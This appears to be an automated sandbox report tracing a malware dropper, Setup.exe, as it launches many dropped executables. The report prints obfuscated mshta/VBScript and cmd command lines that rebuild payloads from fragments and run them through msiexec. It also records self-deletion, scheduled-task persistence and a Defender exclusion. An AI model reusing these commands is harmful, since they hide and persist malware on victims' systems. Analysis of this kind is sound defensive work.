PID 1656 wrote to memory of 1708	1656	Setup.exe	yIOViLE6NiTbJbljLUnCyJgg.exe
PID 1656 wrote to memory of 1708	1656	Setup.exe	yIOViLE6NiTbJbljLUnCyJgg.exe
PID 1656 wrote to memory of 3416	1656	Setup.exe	xlu6sWH4AJ_SSHElWkw0Q4KE.exe
PID 1656 wrote to memory of 3416	1656	Setup.exe	xlu6sWH4AJ_SSHElWkw0Q4KE.exe
PID 1656 wrote to memory of 3416	1656	Setup.exe	xlu6sWH4AJ_SSHElWkw0Q4KE.exe
PID 1656 wrote to memory of 1032	1656	Setup.exe	9Q0WjbSfae46NAERBfzkGpUZ.exe
PID 1656 wrote to memory of 1032	1656	Setup.exe	9Q0WjbSfae46NAERBfzkGpUZ.exe
PID 1656 wrote to memory of 1032	1656	Setup.exe	9Q0WjbSfae46NAERBfzkGpUZ.exe
PID 1656 wrote to memory of 1248	1656	Setup.exe	_h8awGXCAaLKdrj2Cr7DUqne.exe
PID 1656 wrote to memory of 1248	1656	Setup.exe	_h8awGXCAaLKdrj2Cr7DUqne.exe
PID 1656 wrote to memory of 1248	1656	Setup.exe	_h8awGXCAaLKdrj2Cr7DUqne.exe
PID 1656 wrote to memory of 2780	1656	Setup.exe	a7P9a0lUNxcatcFiD1Swk16R.exe
PID 1656 wrote to memory of 2780	1656	Setup.exe	a7P9a0lUNxcatcFiD1Swk16R.exe
PID 1656 wrote to memory of 2780	1656	Setup.exe	a7P9a0lUNxcatcFiD1Swk16R.exe
PID 1656 wrote to memory of 1416	1656	Setup.exe	zFUZaxEbR2NXdHS9pZoPfmJ1.exe
PID 1656 wrote to memory of 1416	1656	Setup.exe	zFUZaxEbR2NXdHS9pZoPfmJ1.exe
PID 1656 wrote to memory of 1416	1656	Setup.exe	zFUZaxEbR2NXdHS9pZoPfmJ1.exe
PID 1656 wrote to memory of 1700	1656	Setup.exe	eLMtdjybMjVt9OmuDLYyxaBx.exe
PID 1656 wrote to memory of 1700	1656	Setup.exe	eLMtdjybMjVt9OmuDLYyxaBx.exe
PID 1656 wrote to memory of 1700	1656	Setup.exe	eLMtdjybMjVt9OmuDLYyxaBx.exe
PID 1656 wrote to memory of 1952	1656	Setup.exe	kdSRwVNcQGlBHuC6yHaVd4RP.exe
PID 1656 wrote to memory of 1952	1656	Setup.exe	kdSRwVNcQGlBHuC6yHaVd4RP.exe
PID 1656 wrote to memory of 1952	1656	Setup.exe	kdSRwVNcQGlBHuC6yHaVd4RP.exe
PID 1656 wrote to memory of 2124	1656	Setup.exe	9xiwBu1hve2uYmiUM8sWumJo.exe
PID 1656 wrote to memory of 2124	1656	Setup.exe	9xiwBu1hve2uYmiUM8sWumJo.exe
PID 1656 wrote to memory of 2124	1656	Setup.exe	9xiwBu1hve2uYmiUM8sWumJo.exe
PID 1656 wrote to memory of 2076	1656	Setup.exe	VxPGzn_0xISnhFtUC4USvMnf.exe
PID 1656 wrote to memory of 2076	1656	Setup.exe	VxPGzn_0xISnhFtUC4USvMnf.exe
PID 1952 wrote to memory of 3140	1952	kdSRwVNcQGlBHuC6yHaVd4RP.exe	cutm3.exe
PID 1952 wrote to memory of 3140	1952	kdSRwVNcQGlBHuC6yHaVd4RP.exe	cutm3.exe
PID 1952 wrote to memory of 3752	1952	kdSRwVNcQGlBHuC6yHaVd4RP.exe	DownFlSetup999.exe
PID 1952 wrote to memory of 3752	1952	kdSRwVNcQGlBHuC6yHaVd4RP.exe	DownFlSetup999.exe
PID 1952 wrote to memory of 1696	1952	kdSRwVNcQGlBHuC6yHaVd4RP.exe	inst3.exe
PID 1952 wrote to memory of 1696	1952	kdSRwVNcQGlBHuC6yHaVd4RP.exe	inst3.exe
PID 1952 wrote to memory of 1696	1952	kdSRwVNcQGlBHuC6yHaVd4RP.exe	inst3.exe
PID 3576 wrote to memory of 2032	3576	7xHyxNFDKgC97CSuVHV9ZNPY.exe	mshta.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1656

C:\Users\Admin\Documents\iPF2G3__Mcs3AMbowRlloXk8.exe
"C:\Users\Admin\Documents\iPF2G3__Mcs3AMbowRlloXk8.exe"
2⤵
- Executes dropped EXE
PID:660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 660 -s 976
3⤵
- Program crash
PID:5360

C:\Users\Admin\Documents\aWWTwMZt99Lewmzjobn3Q0BJ.exe
"C:\Users\Admin\Documents\aWWTwMZt99Lewmzjobn3Q0BJ.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400

C:\Users\Admin\Documents\U2kwiJBFqC05A70eN9Db2kYN.exe
"C:\Users\Admin\Documents\U2kwiJBFqC05A70eN9Db2kYN.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Users\Admin\AppData\Roaming\8197254.exe
"C:\Users\Admin\AppData\Roaming\8197254.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4632

C:\Users\Admin\AppData\Roaming\1501216.exe
"C:\Users\Admin\AppData\Roaming\1501216.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4928

C:\Users\Admin\AppData\Roaming\4540816.exe
"C:\Users\Admin\AppData\Roaming\4540816.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4132

C:\Users\Admin\AppData\Roaming\2883812.exe
"C:\Users\Admin\AppData\Roaming\2883812.exe"
3⤵
- Executes dropped EXE
PID:984

C:\Users\Admin\AppData\Roaming\3698175.exe
"C:\Users\Admin\AppData\Roaming\3698175.exe"
3⤵
- Executes dropped EXE
PID:4576

C:\Users\Admin\AppData\Roaming\8021257.exe
"C:\Users\Admin\AppData\Roaming\8021257.exe"
3⤵
PID:1232

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
4⤵
PID:4036

C:\Users\Admin\Documents\nbAhGCeUPYt1c7OT1icRlCe4.exe
"C:\Users\Admin\Documents\nbAhGCeUPYt1c7OT1icRlCe4.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:364

C:\Users\Admin\Documents\WBmvJwiE2UBHV5jWyYSSkYCd.exe
"C:\Users\Admin\Documents\WBmvJwiE2UBHV5jWyYSSkYCd.exe"
3⤵
- Executes dropped EXE
PID:4904

C:\Users\Admin\Pictures\Adobe Films\bp_pdKkuRRAaDH0ljsKdMUFl.exe
"C:\Users\Admin\Pictures\Adobe Films\bp_pdKkuRRAaDH0ljsKdMUFl.exe"
4⤵
PID:5664

C:\Users\Admin\Pictures\Adobe Films\xH2JTFuAPmfO0u9nbpzCzlep.exe
"C:\Users\Admin\Pictures\Adobe Films\xH2JTFuAPmfO0u9nbpzCzlep.exe"
4⤵
PID:4516

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4516 -s 780
5⤵
- Program crash
PID:2360

C:\Users\Admin\Pictures\Adobe Films\pyrbrZeacivnp8kLRVTsNB8y.exe
"C:\Users\Admin\Pictures\Adobe Films\pyrbrZeacivnp8kLRVTsNB8y.exe"
4⤵
PID:4260

C:\Users\Admin\Pictures\Adobe Films\UjIb26LdA3uj2_WhKhN2HSMX.exe
"C:\Users\Admin\Pictures\Adobe Films\UjIb26LdA3uj2_WhKhN2HSMX.exe"
4⤵
PID:1688

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCRiPt: Close( CrEAteoBjeCt ("WsCrIPT.SHELL" ). RUn("cMd.Exe /c typE ""C:\Users\Admin\Pictures\Adobe Films\UjIb26LdA3uj2_WhKhN2HSMX.exe"" > ..\CBE3FZAEWMMRQ3.EXe&& sTaRT ..\CBE3fZAEWMMRQ3.eXe /pVD5gnhfRb0RJJP & iF """"== """" for %R IN ( ""C:\Users\Admin\Pictures\Adobe Films\UjIb26LdA3uj2_WhKhN2HSMX.exe"") do taskkill /iM ""%~NXR"" -F " , 0 , TrUE) )
5⤵
PID:4592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c typE "C:\Users\Admin\Pictures\Adobe Films\UjIb26LdA3uj2_WhKhN2HSMX.exe" > ..\CBE3FZAEWMMRQ3.EXe&& sTaRT ..\CBE3fZAEWMMRQ3.eXe /pVD5gnhfRb0RJJP & iF ""== "" for %R IN ("C:\Users\Admin\Pictures\Adobe Films\UjIb26LdA3uj2_WhKhN2HSMX.exe") do taskkill /iM "%~NXR" -F
6⤵
- Suspicious use of SetThreadContext
PID:3920

C:\Users\Admin\AppData\Local\Temp\CBE3FZAEWMMRQ3.EXe
..\CBE3fZAEWMMRQ3.eXe /pVD5gnhfRb0RJJP
7⤵
PID:5172

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCRiPt: Close( CrEAteoBjeCt ("WsCrIPT.SHELL" ). RUn("cMd.Exe /c typE ""C:\Users\Admin\AppData\Local\Temp\CBE3FZAEWMMRQ3.EXe"" > ..\CBE3FZAEWMMRQ3.EXe&& sTaRT ..\CBE3fZAEWMMRQ3.eXe /pVD5gnhfRb0RJJP & iF ""/pVD5gnhfRb0RJJP ""== """" for %R IN ( ""C:\Users\Admin\AppData\Local\Temp\CBE3FZAEWMMRQ3.EXe"") do taskkill /iM ""%~NXR"" -F " , 0 , TrUE) )
8⤵
PID:5996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c typE "C:\Users\Admin\AppData\Local\Temp\CBE3FZAEWMMRQ3.EXe" > ..\CBE3FZAEWMMRQ3.EXe&& sTaRT ..\CBE3fZAEWMMRQ3.eXe /pVD5gnhfRb0RJJP & iF "/pVD5gnhfRb0RJJP "== "" for %R IN ("C:\Users\Admin\AppData\Local\Temp\CBE3FZAEWMMRQ3.EXe") do taskkill /iM "%~NXR" -F
9⤵
PID:4140

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScRiPT: ClOsE( CrEAtEobJecT ( "WScRiPt.sHell" ).RuN ( "CMd /q /R eChO | SeT /P = ""MZ"" > M7PH2.ZYT& CopY /Y /B m7PH2.ZYT+ k_BZiO~.Eo + bJFsY5AW.N+ 7PELYi.8 + N3AQ.mT + 9ThlF.B + 5WI~P.1 ..\Ws91HdG.JOV & STARt msiexec /y ..\WS91HdG.jOV & deL /Q *" , 0, trUE ))
8⤵
PID:3896

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R eChO | SeT /P = "MZ" > M7PH2.ZYT& CopY /Y /B m7PH2.ZYT+ k_BZiO~.Eo + bJFsY5AW.N+ 7PELYi.8 +N3AQ.mT +9ThlF.B+5WI~P.1 ..\Ws91HdG.JOV & STARt msiexec /y ..\WS91HdG.jOV & deL /Q *
9⤵
PID:5892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eChO "
10⤵
PID:5512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>M7PH2.ZYT"
10⤵
PID:5676

C:\Windows\SysWOW64\msiexec.exe
msiexec /y ..\WS91HdG.jOV
10⤵
PID:4732

C:\Windows\SysWOW64\taskkill.exe
taskkill /iM "UjIb26LdA3uj2_WhKhN2HSMX.exe" -F
7⤵
- Kills process with taskkill
PID:576

C:\Users\Admin\Pictures\Adobe Films\Cz_g_JNgGBnBRYyyjU3tRMko.exe
"C:\Users\Admin\Pictures\Adobe Films\Cz_g_JNgGBnBRYyyjU3tRMko.exe" /mixtwo
4⤵
PID:5580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Cz_g_JNgGBnBRYyyjU3tRMko.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Cz_g_JNgGBnBRYyyjU3tRMko.exe" & exit
5⤵
PID:360

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Cz_g_JNgGBnBRYyyjU3tRMko.exe" /f
6⤵
- Kills process with taskkill
PID:5024

C:\Users\Admin\Pictures\Adobe Films\Rq3QcPAHNNb3Dj3Ni4b4mkxS.exe
"C:\Users\Admin\Pictures\Adobe Films\Rq3QcPAHNNb3Dj3Ni4b4mkxS.exe"
4⤵
PID:5536

C:\Users\Admin\Pictures\Adobe Films\aKJH1MfwzxGIGg5WNPsKC5kL.exe
"C:\Users\Admin\Pictures\Adobe Films\aKJH1MfwzxGIGg5WNPsKC5kL.exe"
4⤵
PID:2060

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
5⤵
PID:5020

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"
6⤵
PID:6964

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1fc,0x200,0x204,0x1d8,0x208,0x7ffb32b3dec0,0x7ffb32b3ded0,0x7ffb32b3dee0
7⤵
PID:5684

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1648,9268865859177839296,12289267797633310356,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_980824166" --mojo-platform-channel-handle=2100 /prefetch:8
7⤵
PID:6684

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1648,9268865859177839296,12289267797633310356,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_980824166" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2448 /prefetch:1
7⤵
PID:6664

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1648,9268865859177839296,12289267797633310356,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_980824166" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2568 /prefetch:1
7⤵
PID:6592

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,9268865859177839296,12289267797633310356,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_980824166" --mojo-platform-channel-handle=1712 /prefetch:8
7⤵
PID:6668

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1648,9268865859177839296,12289267797633310356,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_980824166" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1664 /prefetch:2
7⤵
PID:6656

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,9268865859177839296,12289267797633310356,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_980824166" --mojo-platform-channel-handle=3184 /prefetch:8
7⤵
PID:2152

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1648,9268865859177839296,12289267797633310356,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_980824166" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3248 /prefetch:2
7⤵
PID:3876

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,9268865859177839296,12289267797633310356,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_980824166" --mojo-platform-channel-handle=2040 /prefetch:8
7⤵
PID:3804

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,9268865859177839296,12289267797633310356,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_980824166" --mojo-platform-channel-handle=2672 /prefetch:8
7⤵
PID:6012

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,9268865859177839296,12289267797633310356,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_980824166" --mojo-platform-channel-handle=3204 /prefetch:8
7⤵
PID:5776

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,9268865859177839296,12289267797633310356,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6964_980824166" --mojo-platform-channel-handle=2764 /prefetch:8
7⤵
PID:1628

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:5008

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:4956

C:\Users\Admin\Documents\JfM3PwEOmENxO0yB0SdCtog7.exe
"C:\Users\Admin\Documents\JfM3PwEOmENxO0yB0SdCtog7.exe"
2⤵
- Executes dropped EXE
PID:3920

C:\Users\Admin\Documents\JfM3PwEOmENxO0yB0SdCtog7.exe
"C:\Users\Admin\Documents\JfM3PwEOmENxO0yB0SdCtog7.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4548

C:\Users\Admin\Documents\XoVho49dQDFLAbtqxLkbbptH.exe
"C:\Users\Admin\Documents\XoVho49dQDFLAbtqxLkbbptH.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3476

C:\Users\Admin\Documents\7xHyxNFDKgC97CSuVHV9ZNPY.exe
"C:\Users\Admin\Documents\7xHyxNFDKgC97CSuVHV9ZNPY.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3576

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Documents\7xHyxNFDKgC97CSuVHV9ZNPY.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Documents\7xHyxNFDKgC97CSuVHV9ZNPY.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
3⤵
PID:2032

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Documents\7xHyxNFDKgC97CSuVHV9ZNPY.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Documents\7xHyxNFDKgC97CSuVHV9ZNPY.exe" ) do taskkill -im "%~NxK" -F
4⤵
PID:4484

C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
5⤵
- Executes dropped EXE
PID:5080

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
6⤵
PID:1956

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
7⤵
PID:4608

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
6⤵
PID:5176

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
7⤵
PID:5356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
8⤵
PID:5564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
8⤵
PID:5968

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y .\N3V4H8H.SXY
8⤵
PID:5536

C:\Windows\SysWOW64\taskkill.exe
taskkill -im "7xHyxNFDKgC97CSuVHV9ZNPY.exe" -F
5⤵
- Kills process with taskkill
PID:4468

C:\Users\Admin\Documents\TDxoBCJZoK1gZeLNzd8xeRh1.exe
"C:\Users\Admin\Documents\TDxoBCJZoK1gZeLNzd8xeRh1.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3596

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:5136

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:1760

C:\Users\Admin\Documents\QN3lhXOYpq_dRAROlLL3SI2l.exe
"C:\Users\Admin\Documents\QN3lhXOYpq_dRAROlLL3SI2l.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3184

C:\Users\Admin\Documents\yIOViLE6NiTbJbljLUnCyJgg.exe
"C:\Users\Admin\Documents\yIOViLE6NiTbJbljLUnCyJgg.exe"
2⤵
- Executes dropped EXE
PID:1708

C:\Users\Admin\Documents\a7P9a0lUNxcatcFiD1Swk16R.exe
"C:\Users\Admin\Documents\a7P9a0lUNxcatcFiD1Swk16R.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Users\Admin\Documents\_h8awGXCAaLKdrj2Cr7DUqne.exe
"C:\Users\Admin\Documents\_h8awGXCAaLKdrj2Cr7DUqne.exe"
2⤵
- Executes dropped EXE
PID:1248

C:\Users\Admin\Documents\9Q0WjbSfae46NAERBfzkGpUZ.exe
"C:\Users\Admin\Documents\9Q0WjbSfae46NAERBfzkGpUZ.exe"
2⤵
- Executes dropped EXE
PID:1032

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 9Q0WjbSfae46NAERBfzkGpUZ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\9Q0WjbSfae46NAERBfzkGpUZ.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:5452

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 9Q0WjbSfae46NAERBfzkGpUZ.exe /f
4⤵
- Kills process with taskkill
PID:5084

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:716

C:\Users\Admin\Documents\xlu6sWH4AJ_SSHElWkw0Q4KE.exe
"C:\Users\Admin\Documents\xlu6sWH4AJ_SSHElWkw0Q4KE.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3416

C:\Users\Admin\Documents\xlu6sWH4AJ_SSHElWkw0Q4KE.exe
C:\Users\Admin\Documents\xlu6sWH4AJ_SSHElWkw0Q4KE.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4244

C:\Users\Admin\Documents\VxPGzn_0xISnhFtUC4USvMnf.exe
"C:\Users\Admin\Documents\VxPGzn_0xISnhFtUC4USvMnf.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:2076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
3⤵
PID:2260

C:\Windows\System32\netsh.exe
